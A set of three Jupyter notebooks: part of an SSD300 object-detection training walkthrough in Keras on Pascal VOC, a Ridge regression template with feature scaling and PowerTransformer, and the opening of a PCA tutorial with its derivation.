Normally, the optimizer of choice would be Adam (commented out below), but since the original implementation uses plain SGD with momentum, we'll do the same in order to reproduce the original training. Adam is generally the superior optimizer, so if your goal is not to have everything exactly as in the original training, feel free to switch to Adam. You might need to adjust the learning rate scheduler below slightly in case you use Adam.
Note that the learning rate that is being set here doesn't matter, because further below we'll pass a learning rate scheduler to the training function, which will overwrite any learning rate set here, i.e. what matters are the learning rates that are defined by the learning rate scheduler.
`SSDLoss` is a custom Keras loss function that implements the multi-task that consists of a log loss for classification and a smooth L1 loss for localization. `neg_pos_ratio` and `alpha` are set as in the paper.
```
# 1: Build the Keras model.
K.clear_session() # Clear previous models from memory.
model = ssd_300(image_size=(img_height, img_width, img_channels),
n_classes=n_classes,
mode='training',
l2_regularization=0.0005,
scales=scales,
aspect_ratios_per_layer=aspect_ratios,
two_boxes_for_ar1=two_boxes_for_ar1,
steps=steps,
offsets=offsets,
clip_boxes=clip_boxes,
variances=variances,
normalize_coords=normalize_coords,
subtract_mean=mean_color,
swap_channels=swap_channels)
# 2: Load some weights into the model.
weights_path = '/usr/local/data/msmith/uncertainty/ssd_keras/weights/VGG_ILSVRC_16_layers_fc_reduced.h5'
model.load_weights(weights_path, by_name=True)
# 3: Instantiate an optimizer and the SSD loss function and compile the model.
# If you want to follow the original Caffe implementation, use the preset SGD
# optimizer, otherwise I'd recommend the commented-out Adam optimizer.
#adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
sgd = SGD(lr=0.001, momentum=0.9, decay=0.0, nesterov=False)
ssd_loss = SSDLoss(neg_pos_ratio=3, alpha=1.0)
model.compile(optimizer=sgd, loss=ssd_loss.compute_loss)
```
### 2.2 Load a previously created model
If you have previously created and saved a model and would now like to load it, execute the next code cell. The only thing you need to do here is to set the path to the saved model HDF5 file that you would like to load.
The SSD model contains custom objects: Neither the loss function nor the anchor box or L2-normalization layer types are contained in the Keras core library, so we need to provide them to the model loader.
This next code cell assumes that you want to load a model that was created in 'training' mode. If you want to load a model that was created in 'inference' or 'inference_fast' mode, you'll have to add the `DecodeDetections` or `DecodeDetectionsFast` layer type to the `custom_objects` dictionary below.
```
# TODO: Set the path to the `.h5` file of the model to be loaded.
model_path = 'path/to/trained/model.h5'
# We need to create an SSDLoss object in order to pass that to the model loader.
ssd_loss = SSDLoss(neg_pos_ratio=3, alpha=1.0)
K.clear_session() # Clear previous models from memory.
model = load_model(model_path, custom_objects={'AnchorBoxes': AnchorBoxes,
'L2Normalization': L2Normalization,
'compute_loss': ssd_loss.compute_loss})
```
## 3. Set up the data generators for the training
The code cells below set up the data generators for the training and validation datasets to train the model. The settings below reproduce the original SSD training on Pascal VOC 2007 `trainval` plus 2012 `trainval` and validation on Pascal VOC 2007 `test`.
The only thing you need to change here are the filepaths to the datasets on your local machine. Note that parsing the labels from the XML annotations files can take a while.
Note that the generator provides two options to speed up the training. By default, it loads the individual images for a batch from disk. This has two disadvantages. First, for compressed image formats like JPG, this is a huge computational waste, because every image needs to be decompressed again and again every time it is being loaded. Second, the images on disk are likely not stored in a contiguous block of memory, which may also slow down the loading process. The first option that `DataGenerator` provides to deal with this is to load the entire dataset into memory, which reduces the access time for any image to a negligible amount, but of course this is only an option if you have enough free memory to hold the whole dataset. As a second option, `DataGenerator` provides the possibility to convert the dataset into a single HDF5 file. This HDF5 file stores the images as uncompressed arrays in a contiguous block of memory, which dramatically speeds up the loading time. It's not as good as having the images in memory, but it's a lot better than the default option of loading them from their compressed JPG state every time they are needed. Of course such an HDF5 dataset may require significantly more disk space than the compressed images (around 9 GB total for Pascal VOC 2007 `trainval` plus 2012 `trainval` and another 2.6 GB for 2007 `test`). You can later load these HDF5 datasets directly in the constructor.
The original SSD implementation uses a batch size of 32 for the training. In case you run into GPU memory issues, reduce the batch size accordingly. You need at least 7 GB of free GPU memory to train an SSD300 with 20 object classes with a batch size of 32.
The `DataGenerator` itself is fairly generic. I doesn't contain any data augmentation or bounding box encoding logic. Instead, you pass a list of image transformations and an encoder for the bounding boxes in the `transformations` and `label_encoder` arguments of the data generator's `generate()` method, and the data generator will then apply those given transformations and the encoding to the data. Everything here is preset already, but if you'd like to learn more about the data generator and its data augmentation capabilities, take a look at the detailed tutorial in [this](https://github.com/pierluigiferrari/data_generator_object_detection_2d) repository.
The data augmentation settings defined further down reproduce the data augmentation pipeline of the original SSD training. The training generator receives an object `ssd_data_augmentation`, which is a transformation object that is itself composed of a whole chain of transformations that replicate the data augmentation procedure used to train the original Caffe implementation. The validation generator receives an object `resize`, which simply resizes the input images.
An `SSDInputEncoder` object, `ssd_input_encoder`, is passed to both the training and validation generators. As explained above, it matches the ground truth labels to the model's anchor boxes and encodes the box coordinates into the format that the model needs.
In order to train the model on a dataset other than Pascal VOC, either choose `DataGenerator`'s appropriate parser method that corresponds to your data format, or, if `DataGenerator` does not provide a suitable parser for your data format, you can write an additional parser and add it. Out of the box, `DataGenerator` can handle datasets that use the Pascal VOC format (use `parse_xml()`), the MS COCO format (use `parse_json()`) and a wide range of CSV formats (use `parse_csv()`).
```
# 1: Instantiate two `DataGenerator` objects: One for training, one for validation.
# Optional: If you have enough memory, consider loading the images into memory for the reasons explained above.
train_dataset = DataGenerator(load_images_into_memory=True, hdf5_dataset_path=None)
val_dataset = DataGenerator(load_images_into_memory=True, hdf5_dataset_path=None)
# 2: Parse the image and label lists for the training and validation datasets. This can take a while.
# TODO: Set the paths to the datasets here.
# The directories that contain the images.
VOC_2007_images_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/JPEGImages/'
VOC_2012_images_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/JPEGImages/'
# The directories that contain the annotations.
VOC_2007_annotations_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/Annotations/'
VOC_2012_annotations_dir = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/Annotations/'
# The paths to the image sets.
VOC_2007_train_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/train.txt'
VOC_2012_train_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/ImageSets/Main/train.txt'
VOC_2007_val_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/val.txt'
VOC_2012_val_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/ImageSets/Main/val.txt'
VOC_2007_trainval_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/trainval.txt'
VOC_2012_trainval_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2012/ImageSets/Main/trainval.txt'
VOC_2007_test_image_set_filename = '/usr/local/data/msmith/APL/Datasets/PASCAL/VOCdevkit/VOC2007/ImageSets/Main/test.txt'
# The XML parser needs to now what object class names to look for and in which order to map them to integers.
classes = ['background',
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat',
'chair', 'cow', 'diningtable', 'dog',
'horse', 'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor']
# train_dataset.parse_xml(images_dirs=[VOC_2007_images_dir,
# VOC_2012_images_dir],
# image_set_filenames=[VOC_2007_trainval_image_set_filename,
# VOC_2012_trainval_image_set_filename],
# annotations_dirs=[VOC_2007_annotations_dir,
# VOC_2012_annotations_dir],
# classes=classes,
# include_classes='all',
# exclude_truncated=False,
# exclude_difficult=False,
# ret=False)
train_dataset.parse_xml(images_dirs=[VOC_2007_images_dir, VOC_2012_images_dir],
image_set_filenames=[VOC_2007_train_image_set_filename, VOC_2012_train_image_set_filename],
annotations_dirs=[VOC_2007_annotations_dir, VOC_2012_annotations_dir],
classes=classes,
include_classes='all',
exclude_truncated=False,
exclude_difficult=False,
ret=False)
val_dataset.parse_xml(images_dirs=[VOC_2012_images_dir],
image_set_filenames=[VOC_2012_val_image_set_filename],
annotations_dirs=[VOC_2012_annotations_dir],
classes=classes,
include_classes='all',
exclude_truncated=False,
exclude_difficult=True,
ret=False)
# Optional: Convert the dataset into an HDF5 dataset. This will require more disk space, but will
# speed up the training. Doing this is not relevant in case you activated the `load_images_into_memory`
# option in the constructor, because in that cas the images are in memory already anyway. If you don't
# want to create HDF5 datasets, comment out the subsequent two function calls.
# train_dataset.create_hdf5_dataset(file_path='dataset_pascal_voc_07+12_trainval.h5',
# resize=False,
# variable_image_size=True,
# verbose=True)
# val_dataset.create_hdf5_dataset(file_path='dataset_pascal_voc_07_test.h5',
# resize=False,
# variable_image_size=True,
# verbose=True)
# 3: Set the batch size.
batch_size = 32 # Change the batch size if you like, or if you run into GPU memory issues.
# 4: Set the image transformations for pre-processing and data augmentation options.
# For the training generator:
ssd_data_augmentation = SSDDataAugmentation(img_height=img_height,
img_width=img_width,
background=mean_color)
# For the validation generator:
convert_to_3_channels = ConvertTo3Channels()
resize = Resize(height=img_height, width=img_width)
# 5: Instantiate an encoder that can encode ground truth labels into the format needed by the SSD loss function.
# The encoder constructor needs the spatial dimensions of the model's predictor layers to create the anchor boxes.
predictor_sizes = [model.get_layer('conv4_3_norm_mbox_conf').output_shape[1:3],
model.get_layer('fc7_mbox_conf').output_shape[1:3],
model.get_layer('conv6_2_mbox_conf').output_shape[1:3],
model.get_layer('conv7_2_mbox_conf').output_shape[1:3],
model.get_layer('conv8_2_mbox_conf').output_shape[1:3],
model.get_layer('conv9_2_mbox_conf').output_shape[1:3]]
ssd_input_encoder = SSDInputEncoder(img_height=img_height,
img_width=img_width,
n_classes=n_classes,
predictor_sizes=predictor_sizes,
scales=scales,
aspect_ratios_per_layer=aspect_ratios,
two_boxes_for_ar1=two_boxes_for_ar1,
steps=steps,
offsets=offsets,
clip_boxes=clip_boxes,
variances=variances,
matching_type='multi',
pos_iou_threshold=0.5,
neg_iou_limit=0.5,
normalize_coords=normalize_coords)
# 6: Create the generator handles that will be passed to Keras' `fit_generator()` function.
train_generator = train_dataset.generate(batch_size=batch_size,
shuffle=True,
transformations=[ssd_data_augmentation],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
val_generator = val_dataset.generate(batch_size=batch_size,
shuffle=False,
transformations=[convert_to_3_channels,
resize],
label_encoder=ssd_input_encoder,
returns={'processed_images',
'encoded_labels'},
keep_images_without_gt=False)
# Get the number of samples in the training and validations datasets.
train_dataset_size = train_dataset.get_dataset_size()
val_dataset_size = val_dataset.get_dataset_size()
print("Number of images in the training dataset:\t{:>6}".format(train_dataset_size))
print("Number of images in the validation dataset:\t{:>6}".format(val_dataset_size))
```
## 4. Set the remaining training parameters
We've already chosen an optimizer and set the batch size above, now let's set the remaining training parameters. I'll set one epoch to consist of 1,000 training steps. The next code cell defines a learning rate schedule that replicates the learning rate schedule of the original Caffe implementation for the training of the SSD300 Pascal VOC "07+12" model. That model was trained for 120,000 steps with a learning rate of 0.001 for the first 80,000 steps, 0.0001 for the next 20,000 steps, and 0.00001 for the last 20,000 steps. If you're training on a different dataset, define the learning rate schedule however you see fit.
I'll set only a few essential Keras callbacks below, feel free to add more callbacks if you want TensorBoard summaries or whatever. We obviously need the learning rate scheduler and we want to save the best models during the training. It also makes sense to continuously stream our training history to a CSV log file after every epoch, because if we didn't do that, in case the training terminates with an exception at some point or if the kernel of this Jupyter notebook dies for some reason or anything like that happens, we would lose the entire history for the trained epochs. Finally, we'll also add a callback that makes sure that the training terminates if the loss becomes `NaN`. Depending on the optimizer you use, it can happen that the loss becomes `NaN` during the first iterations of the training. In later iterations it's less of a risk. For example, I've never seen a `NaN` loss when I trained SSD using an Adam optimizer, but I've seen a `NaN` loss a couple of times during the very first couple of hundred training steps of training a new model when I used an SGD optimizer.
```
# Define a learning rate schedule.
# def lr_schedule(epoch):
# if epoch < 80:
# return 0.001
# elif epoch < 100:
# return 0.0001
# else:
# return 0.00001
# Define a learning rate schedule.
def lr_schedule(epoch):
if epoch < 56:
return 0.001
elif epoch < 76:
return 0.0001
else:
return 0.00001
# Define model callbacks.
# TODO: Set the filepath under which you want to save the model.
model_checkpoint = ModelCheckpoint(filepath='ssd300_dropout_PASCAL2012_train_+12_epoch-{epoch:02d}_loss-{loss:.4f}_val_loss-{val_loss:.4f}.h5',
monitor='val_loss',
verbose=1,
save_best_only=True,
save_weights_only=False,
mode='auto',
period=1)
#model_checkpoint.best =
csv_logger = CSVLogger(filename='ssd300_dropout_pascal_07+12_training_log.csv',
separator=',',
append=True)
learning_rate_scheduler = LearningRateScheduler(schedule=lr_schedule,
verbose=1)
terminate_on_nan = TerminateOnNaN()
callbacks = [model_checkpoint,
csv_logger,
learning_rate_scheduler,
terminate_on_nan]
```
## 5. Train
In order to reproduce the training of the "07+12" model mentioned above, at 1,000 training steps per epoch you'd have to train for 120 epochs. That is going to take really long though, so you might not want to do all 120 epochs in one go and instead train only for a few epochs at a time. You can find a summary of a full training [here](https://github.com/pierluigiferrari/ssd_keras/blob/master/training_summaries/ssd300_pascal_07%2B12_training_summary.md).
In order to only run a partial training and resume smoothly later on, there are a few things you should note:
1. Always load the full model if you can, rather than building a new model and loading previously saved weights into it. Optimizers like SGD or Adam keep running averages of past gradient moments internally. If you always save and load full models when resuming a training, then the state of the optimizer is maintained and the training picks up exactly where it left off. If you build a new model and load weights into it, the optimizer is being initialized from scratch, which, especially in the case of Adam, leads to small but unnecessary setbacks every time you resume the training with previously saved weights.
2. In order for the learning rate scheduler callback above to work properly, `fit_generator()` needs to know which epoch we're in, otherwise it will start with epoch 0 every time you resume the training. Set `initial_epoch` to be the next epoch of your training. Note that this parameter is zero-based, i.e. the first epoch is epoch 0. If you had trained for 10 epochs previously and now you'd want to resume the training from there, you'd set `initial_epoch = 10` (since epoch 10 is the eleventh epoch). Furthermore, set `final_epoch` to the last epoch you want to run. To stick with the previous example, if you had trained for 10 epochs previously and now you'd want to train for another 10 epochs, you'd set `initial_epoch = 10` and `final_epoch = 20`.
3. In order for the model checkpoint callback above to work correctly after a kernel restart, set `model_checkpoint.best` to the best validation loss from the previous training. If you don't do this and a new `ModelCheckpoint` object is created after a kernel restart, that object obviously won't know what the last best validation loss was, so it will always save the weights of the first epoch of your new training and record that loss as its new best loss. This isn't super-important, I just wanted to mention it.
```
# If you're resuming a previous training, set `initial_epoch` and `final_epoch` accordingly.
initial_epoch = 0
final_epoch = 120
steps_per_epoch = 1000
history = model.fit_generator(generator=train_generator,
steps_per_epoch=steps_per_epoch,
epochs=final_epoch,
callbacks=callbacks,
validation_data=val_generator,
validation_steps=ceil(val_dataset_size/batch_size),
initial_epoch=initial_epoch)
```
## 6. Make predictions
Now let's make some predictions on the validation dataset with the trained model. For convenience we'll use the validation generator that we've already set up above. Feel free to change the batch size.
You can set the `shuffle` option to `False` if you would like to check the model's progress on the same image(s) over the course of the training.
```
# 1: Set the generator for the predictions.
predict_generator = val_dataset.generate(batch_size=1,
shuffle=False,
transformations=[convert_to_3_channels,
resize],
label_encoder=None,
returns={'processed_images',
'filenames',
'inverse_transform',
'original_images',
'original_labels'},
keep_images_without_gt=False)
# 2: Generate samples.
batch_images, batch_filenames, batch_inverse_transforms, batch_original_images, batch_original_labels = next(predict_generator)
i = 0 # Which batch item to look at
print("Image:", batch_filenames[i])
print()
print("Ground truth boxes:\n")
print(np.array(batch_original_labels[i]))
plt.imshow(batch_images[i])
# 3: Make predictions.
# TODO: wrap in for loop for N iterations
# Results of each should be different, i.e. should get a number of different predictions (e.g. take 1 = 2 detections, take 2 = 3)
# Should be (but not always) a lot of overlap
# Need to process them - partitioning detections into observations
# Find high IOU areas
y_pred = model.predict(batch_images)
```
Now let's decode the raw predictions in `y_pred`.
Had we created the model in 'inference' or 'inference_fast' mode, then the model's final layer would be a `DecodeDetections` layer and `y_pred` would already contain the decoded predictions, but since we created the model in 'training' mode, the model outputs raw predictions that still need to be decoded and filtered. This is what the `decode_detections()` function is for. It does exactly what the `DecodeDetections` layer would do, but using Numpy instead of TensorFlow (i.e. on the CPU instead of the GPU).
`decode_detections()` with default argument values follows the procedure of the original SSD implementation: First, a very low confidence threshold of 0.01 is applied to filter out the majority of the predicted boxes, then greedy non-maximum suppression is performed per class with an intersection-over-union threshold of 0.45, and out of what is left after that, the top 200 highest confidence boxes are returned. Those settings are for precision-recall scoring purposes though. In order to get some usable final predictions, we'll set the confidence threshold much higher, e.g. to 0.5, since we're only interested in the very confident predictions.
```
print(y_pred)
print(y_pred.shape)
# 4: Decode the raw predictions in `y_pred`.
y_pred_decoded = decode_detections(y_pred,
confidence_thresh=0.5,
iou_threshold=0.4,
top_k=200,
normalize_coords=normalize_coords,
img_height=img_height,
img_width=img_width)
```
We made the predictions on the resized images, but we'd like to visualize the outcome on the original input images, so we'll convert the coordinates accordingly. Don't worry about that opaque `apply_inverse_transforms()` function below, in this simple case it just aplies `(* original_image_size / resized_image_size)` to the box coordinates.
```
# 5: Convert the predictions for the original image.
y_pred_decoded_inv = apply_inverse_transforms(y_pred_decoded, batch_inverse_transforms)
np.set_printoptions(precision=2, suppress=True, linewidth=90)
print("Predicted boxes:\n")
print(' class conf xmin ymin xmax ymax')
print(y_pred_decoded_inv[i])
```
Finally, let's draw the predicted boxes onto the image. Each predicted box says its confidence next to the category name. The ground truth boxes are also drawn onto the image in green for comparison.
```
# 5: Draw the predicted boxes onto the image
# Set the colors for the bounding boxes
colors = plt.cm.hsv(np.linspace(0, 1, n_classes+1)).tolist()
classes = ['background',
'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat',
'chair', 'cow', 'diningtable', 'dog',
'horse', 'motorbike', 'person', 'pottedplant',
'sheep', 'sofa', 'train', 'tvmonitor']
plt.figure(figsize=(20,12))
plt.imshow(batch_original_images[i])
current_axis = plt.gca()
for box in batch_original_labels[i]:
xmin = box[1]
ymin = box[2]
xmax = box[3]
ymax = box[4]
label = '{}'.format(classes[int(box[0])])
current_axis.add_patch(plt.Rectangle((xmin, ymin), xmax-xmin, ymax-ymin, color='green', fill=False, linewidth=2))
current_axis.text(xmin, ymin, label, size='x-large', color='white', bbox={'facecolor':'green', 'alpha':1.0})
for box in y_pred_decoded_inv[i]:
xmin = box[2]
ymin = box[3]
xmax = box[4]
ymax = box[5]
color = colors[int(box[0])]
label = '{}: {:.2f}'.format(classes[int(box[0])], box[1])
current_axis.add_patch(plt.Rectangle((xmin, ymin), xmax-xmin, ymax-ymin, color=color, fill=False, linewidth=2))
current_axis.text(xmin, ymin, label, size='x-large', color='white', bbox={'facecolor':color, 'alpha':1.0})
model.summary()
```
|
github_jupyter
|
# RidgeRegression with Scale & Power Transformer
This Code template is for the regression analysis using simple Ridge Regression with Feature Rescaling technique Scale and Feature Transformation technique PowerTransformer in a pipeline. Ridge Regression is also known as Tikhonov regularization.
### Required Packages
```
import warnings
import numpy as np
import pandas as pd
import seaborn as se
import matplotlib.pyplot as plt
from sklearn.linear_model import Ridge
from sklearn.pipeline import Pipeline,make_pipeline
from sklearn.preprocessing import scale,PowerTransformer
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error
warnings.filterwarnings('ignore')
```
### Initialization
Filepath of CSV file
```
#filepath
file_path= ""
```
List of features which are required for model training .
```
#x_values
features=[]
```
Target feature for prediction.
```
#y_value
target=''
```
### Data Fetching
Pandas is an open-source, BSD-licensed library providing high-performance, easy-to-use data manipulation and data analysis tools.
We will use panda's library to read the CSV file using its storage path.And we use the head function to display the initial row or entry.
```
df=pd.read_csv(file_path)
df.head()
```
### Feature Selections
It is the process of reducing the number of input variables when developing a predictive model. Used to reduce the number of input variables to both reduce the computational cost of modelling and, in some cases, to improve the performance of the model.
We will assign all the required input features to X and target/outcome to Y.
```
X=df[features]
Y=df[target]
```
### Data Preprocessing
Since the majority of the machine learning models in the Sklearn library doesn't handle string category data and Null value, we have to explicitly remove or replace null values. The below snippet have functions, which removes the null value if any exists. And convert the string classes data in the datasets by encoding them to integer classes.
```
def NullClearner(df):
if(isinstance(df, pd.Series) and (df.dtype in ["float64","int64"])):
df.fillna(df.mean(),inplace=True)
return df
elif(isinstance(df, pd.Series)):
df.fillna(df.mode()[0],inplace=True)
return df
else:return df
def EncodeX(df):
return pd.get_dummies(df)
```
Calling preprocessing functions on the feature and target set.
```
x=X.columns.to_list()
for i in x:
X[i]=NullClearner(X[i])
X=EncodeX(X)
Y=NullClearner(Y)
X.head()
```
#### Correlation Map
In order to check the correlation between the features, we will plot a correlation matrix. It is effective in summarizing a large amount of data where the goal is to see patterns.
```
f,ax = plt.subplots(figsize=(18, 18))
matrix = np.triu(X.corr())
se.heatmap(X.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax, mask=matrix)
plt.show()
```
### Data Splitting
The train-test split is a procedure for evaluating the performance of an algorithm. The procedure involves taking a dataset and dividing it into two subsets. The first subset is utilized to fit/train the model. The second subset is used for prediction. The main motive is to estimate the performance of the model on new data.
```
x_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.2,random_state=123)
```
### Data Rescaling
<Code>scale</Code> standardizes a dataset along any axis. It standardizes features by removing the mean and scaling to unit variance.
scale is similar to <Code>StandardScaler</Code> in terms of feature transformation, but unlike StandardScaler, it lacks Transformer API i.e., it does not have <Code>fit_transform</Code>, <Code>transform</Code> and other related methods.
```
x_train =scale(x_train)
x_test = scale(x_test)
```
### Feature Transformation
Power transforms are a family of parametric, monotonic transformations that are applied to make data more Gaussian-like. This is useful for modeling issues related to heteroscedasticity (non-constant variance), or other situations where normality is desired.
##### For more information on PowerTransformer [ click here](https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.PowerTransformer.html)
### Model
Ridge regression addresses some of the problems of Ordinary Least Squares by imposing a penalty on the size of the coefficients. The ridge coefficients minimize a penalized residual sum of squares:
\begin{equation*}
\min_{w} || X w - y||_2^2 + \alpha ||w||_2^2
\end{equation*}
The complexity parameter controls the amount of shrinkage: the larger the value of , the greater the amount of shrinkage and thus the coefficients become more robust to collinearity.
This model solves a regression model where the loss function is the linear least squares function and regularization is given by the l2-norm. Also known as Ridge Regression or Tikhonov regularization. This estimator has built-in support for multi-variate regression (i.e., when y is a 2d-array of shape (n_samples, n_targets)).
#### Model Tuning Parameters
> **alpha** -> Regularization strength; must be a positive float. Regularization improves the conditioning of the problem and reduces the variance of the estimates. Larger values specify stronger regularization.
> **solver** -> Solver to use in the computational routines {‘auto’, ‘svd’, ‘cholesky’, ‘lsqr’, ‘sparse_cg’, ‘sag’, ‘saga’}
```
model=make_pipeline(PowerTransformer(), Ridge(random_state=123))
model.fit(x_train,y_train)
```
#### Model Accuracy
We will use the trained model to make a prediction on the test set.Then use the predicted value for measuring the accuracy of our model.
> **score**: The **score** function returns the coefficient of determination <code>R<sup>2</sup></code> of the prediction.
```
y_pred=model.predict(x_test)
print("Accuracy score {:.2f} %\n".format(model.score(x_test,y_test)*100))
```
> **r2_score**: The **r2_score** function computes the percentage variablility explained by our model, either the fraction or the count of correct predictions.
> **mae**: The **mean abosolute error** function calculates the amount of total error(absolute average distance between the real data and the predicted data) by our model.
> **mse**: The **mean squared error** function squares the error(penalizes the model for large errors) by our model.
```
print("R2 Score: {:.2f} %".format(r2_score(y_test,y_pred)*100))
print("Mean Absolute Error {:.2f}".format(mean_absolute_error(y_test,y_pred)))
print("Mean Squared Error {:.2f}".format(mean_squared_error(y_test,y_pred)))
```
#### Prediction Plot
First, we make use of a plot to plot the actual observations, with x_train on the x-axis and y_train on the y-axis.
For the regression line, we will use x_train on the x-axis and then the predictions of the x_train observations on the y-axis.
```
plt.figure(figsize=(14,10))
plt.plot(range(20),y_test[0:20], color = "green")
plt.plot(range(20),model.predict(x_test[0:20]), color = "red")
plt.legend(["Actual","prediction"])
plt.title("Predicted vs True Value")
plt.xlabel("Record number")
plt.ylabel(target)
plt.show()
```
#### Creator: Ganapathi Thota , Github: [Profile](https://github.com/Shikiz)
|
github_jupyter
|
# Understanding Principal Component Analysis
**Outline**
* [Introduction](#intro)
* [Assumption and derivation](#derive)
* [PCA Example](#example)
* [PCA Usage](#usage)
```
%load_ext watermark
%matplotlib inline
# %config InlineBackend.figure_format='retina'
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import math
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
%watermark -a 'Johnny' -d -t -v -p numpy,pandas,matplotlib,sklearn
```
---
## <a id="intro">Introduction</a>
When we have two features that are highly correlated with each other, we may not want to include both of them in our model. In [Lasso and Ridge regression](http://nbviewer.jupyter.org/github/johnnychiuchiu/Machine-Learning/blob/master/LinearRegression/linearRegressionModelBuilding.ipynb#ridge), what it does is fitting a model with all the predictors but put a penalized term, either L1 or L2 norm on the value of the regression coefficients, this will shrinks the coefficient estimates towards zero. In other words, it try to pick some predictors out of all the predictors in order to reduce the dimension of our column space.
Principal Component Analysis(PCA) is another type of dimension reduction method. What PCA is all about is **Finding the directions of maximum variance in high-dimensional data and project it onto a smaller dimensional subspace while retaining most of the information.** The main idea and motivation is that each of the $n$ observations lives in $p$-dimensional space, but not all of these dimensions are equally interesting. PCA seeks a small number of dimensions that are as intersteing as possible. The concept of *interesting* is measured by the amount that the observations vary along each dimension.
Note that PCA is just a linear transformation method. Compared to the original space, it can project our high-dimensional data into another dimension, of which each of the direction are with the maximum variance. In other words, the orthogonality of principal components implies that PCA finds the most uncorrelated components to explain as much variation in the data as possible. We can then pick the number of directions, i.e. components, we want to keep while containing most of the information of the original data. The direction of the highest variance is called the first principal component, the second highest is call the second principal component, and so on.
In PCA, we found out that the first principal component is obtained by doing eigendecomposition of the covariance matrix X, and the eigenvector with the largest eigenvalue is our first principal component in the sense that every vector in the span of this eigenvector will strech out by the largest amount, since eigenvalues are the factors by which the eigenvectors streckes or squishes during the transformation. Therefore, we can sort the top k component by the value of the eigenvalues that we found from doing eigendecomposition of the covariance matrix X.
**Application of PCA**
* We can use PCA as a tool for data visualization. For instance, if we can obtain a two-dimensional representation of the data that captures most of the information, then we can plot hte observations in this low-dimensional space.
* We can use princial components as predictors in a regression model in place of the original larger set of variables.
---
## <a id="derive">Assumption and derivation</a>
**Assumption** for PCA before we derive the whole process are
* Since we are only interested in variance, we assume that each of the variables in $X$ has been and should be centered to have mean zero, i.e. the column means of $X$ are zero.
**Method Derivation**
Assume we have n observation, and a set of features $X1, X2, X3, \dots, Xp$. In order words, we have
\begin{pmatrix}
x_{1,1} & x_{1,2} & \cdots & x_{1,p} \\
x_{2,1} & x_{2,2} & \cdots & x_{2,p} \\
\vdots & \vdots & \ddots & \vdots \\
x_{n,1} & x_{n,2} & \cdots & x_{n,p}
\end{pmatrix}
where
\begin{equation*}
X1 = \begin{bmatrix}
x_{1,1} \\
x_{2,1} \\
\vdots \\
x_{n,1}
\end{bmatrix}
\end{equation*}
PCA will try to find a low dimensional representation of a dataset that contains as much as possible of the variance. The idea is that each of the n observations lives in p-dimensional space, but not all of these dimensions are equally interesting. PCA seeks a small number of dimensions that are as interesting as possible. Let see how these dimensions, or *principal component* are found.
Given $n \times p$ data set $X$, how do we compute the first principal component? We look for the linear combination of the sample feature values of the form
$$z_{i,1} = \phi_{1,1}x_{i,1}+\phi_{2,1}x_{i,2}+\dots+\phi_{p,1}x_{i,p}$$
where
0<i<n and $\phi_1$ denotes the first principal component loading vector, which is
\begin{equation*}
\phi_1=\begin{pmatrix}
\phi_{1,1} \\
\phi_{2,1} \\
\vdots \\
\phi_{p,1}
\end{pmatrix}
\end{equation*}
We'll have n values of $z_1$, and we want to look for the linear combination that has the largest sample variance. More formally,
\begin{equation*}
Z_1
=
\begin{pmatrix}
z_{1,1} \\
z_{2,1} \\
\vdots \\
z_{n,1}
\end{pmatrix}
=
\begin{pmatrix}
\phi_{1,1}x_{1,1} + \phi_{2,1}x_{1,2} + \cdots + \phi_{p,1}x_{1,p} \\
\phi_{1,1}x_{2,1} + \phi_{2,1}x_{2,2} + \cdots + \phi_{p,1}x_{2,p} \\
\vdots \\
\phi_{1,1}x_{n,1} + \phi_{2,1}x_{n,2} + \cdots + \phi_{p,1}x_{n,p}
\end{pmatrix}
=
\begin{pmatrix}
\phi_{1,1}
\phi_{2,1}
\dots
\phi_{p,1}
\end{pmatrix}
\begin{pmatrix}
x_{1,1} & x_{1,2} & \cdots & x_{1,p} \\
x_{2,1} & x_{2,2} & \cdots & x_{2,p} \\
\vdots & \vdots & \ddots & \vdots \\
x_{n,1} & x_{n,2} & \cdots & x_{n,p}
\end{pmatrix}
=
\phi_{1,1}X_{1}+\phi_{2,1}X_{2}+\dots+\phi_{p,1}X_{p}
=
\phi_1^T X
\end{equation*}
We assume that each of the variables in $X$ has been centered to have mean zero, i.e., the column means of $X$ are zero. Therefore, $E(X_i)=0$ for i in 1,...p. It's obvious to know that $E(Z_1)=E(\phi_{1,1}X_{1}+\phi_{2,1}X_{2}+\dots+\phi_{p,1}X_{p}) = 0$
Therefore, the variance of $Z_1$ is
$$Var(Z_1) = E\Big[[Z_1-E(Z_1)][Z_1-E(Z_1)]^T\Big] = E\Big[Z_1 Z_1^T \Big] = E\Big[(\phi_1^T X) (\phi_1^T X)^T \Big] = E\Big[\phi_1^T X X^T \phi_1\Big] = \phi_1^T E[X X^T] \phi_1$$
We also know that the [covariance matrix](https://en.wikipedia.org/wiki/Covariance_matrix) of X is
$$C = Cov(X) = E\Big[[X-E(X)][X-E(X)]^T\Big] = E[X X^T]$$
